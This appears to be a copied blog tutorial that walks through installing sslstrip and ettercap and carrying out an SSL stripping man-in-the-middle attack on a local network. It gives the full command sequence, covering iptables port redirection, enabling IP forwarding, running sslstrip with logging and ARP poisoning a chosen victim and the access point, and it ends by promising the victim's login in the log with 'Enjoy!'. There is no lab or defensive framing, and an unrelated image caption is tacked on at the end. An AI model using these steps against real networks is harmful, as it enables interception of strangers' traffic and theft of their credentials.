<a href="http://timashley.me/node/368">http://timashley.me/node/368</a>
This tool provides a demonstration of the HTTPS stripping attacks that was presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links
or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial.
In this article i will walk you through installing SSLstrip along with ettercap and perform a MITM attack.
1) Download Ettercap with GTK
sudo apt-get install ettercap ettercap-gtk
2) Download sslstrip
3) Extract sslstrip
tar zxvf sslstrip-0.7.tar.gz
4) Redirect requests on port 80 (HTTP) to sslstrip running on port 10000
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
5) Verify the entry in nat table
sudo iptables --list -t nat
6) Enable forwarding
sudo echo "1" > /proc/sys/net/ipv4/ip_forward
7) Check forwarding
sudo cat /proc/sys/net/ipv4/ip_forward
You should get 1 as a reply
8) Run sslstrip logging on port 10000
sudo python sslstrip-0.7/sslstrip.py -w sslstrip.log -l 10000
9) Monitor the log
sudo tail -F sslstrip.log
10) Launch ettercap GUI with packet dump
sudo ettercap -G -w ~/ettercap_packets.pcap
11) Enter Unified sniffing
Sniff -> Unified sniffing
12) Select your wireless interface (this may be different than mine, check yours via 'ifconfig')
Network interface: wlan0
13) Scan for hosts
Hosts -> Scan for hosts
14) View hosts list from scan
Hosts -> Host list
15) Select targets
Highlight the victim -> Add to Target 1
Highlight the access point -> Add to Target 2
16) View added targets
Targets -> Current Targets
17) Perform arp poisoning (MITM Attack) on targets
Mitm -> Arp poisoning
After the victim logs in, you will see the output in your sslstrip.log. Don't forget to go back with
Enjoy!
![TestLink导出用例转换工具(XML2Excel)[图]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)